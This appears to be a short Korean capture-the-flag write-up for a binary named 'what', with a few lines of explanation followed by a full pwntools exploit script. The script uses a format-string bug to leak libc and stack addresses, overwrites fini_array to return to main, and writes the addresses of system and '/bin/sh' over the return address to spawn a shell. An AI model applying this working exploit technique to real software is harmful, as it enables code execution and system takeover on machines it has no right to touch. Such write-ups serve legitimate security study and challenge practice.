what-fsb $를 이용한 libc릭, 스택주소릭, fini array를 메인으로

what

%2$x %264$x를 해서 스택주소와 libc주소릭을 한다.

fini_array부분은 write권한이 있으므로, 이 부분을 메인으로 고쳐 메인으로 돌린다.

fsb를 이용하여 return address부분을 system주소로, return address+8부분을 /bin/sh주소로!

from pwn import *

import time

s=process('./what')

#print(s.recv(1024))

#raw_input()

payload=p32(0x080496dc)

payload+="%2$x"

payload+="%264$x"

payload+="%33927c"

payload+="%7$hn"

s.send(payload+"\n")

a=s.recv(1024)[0x1a:0x2a]

libc=int(a[0:8],16)

system=libc-0x16d910

system1=system&0xffff

system2=(system>>16)+0x10000

sh=libc-0x4af34

sh1=(sh&0xffff)+0x20000

sh2=(sh>>16)+0x30000

stack=int(a[8:16],16)

stack=stack-0xe4

print(hex(system))

print(hex(system1))

print(hex(system2))

print(hex(sh))

print(hex(sh1))

print(hex(sh2))

print(hex(stack))

system1=system1-0x10

system2=system2-0x10

sh1=sh1-0x10

sh2=sh2-0x10

payload2=p32(stack)

payload2+=p32(stack+2)

payload2+=p32(stack+8)

payload2+=p32(stack+10)

payload2+="%"+str(system1)+"c"

payload2+="%7$n"

payload2+="%"+str(system2-system1)+"c"

payload2+="%8$n"

payload2+="%"+str(sh1-system2)+"c"

payload2+="%9$n"

payload2+="%"+str(sh2-sh1)+"c"

payload2+="%10$n"

s.send(payload2+"\n")

s.recv(1024)

s.interactive()

s.close()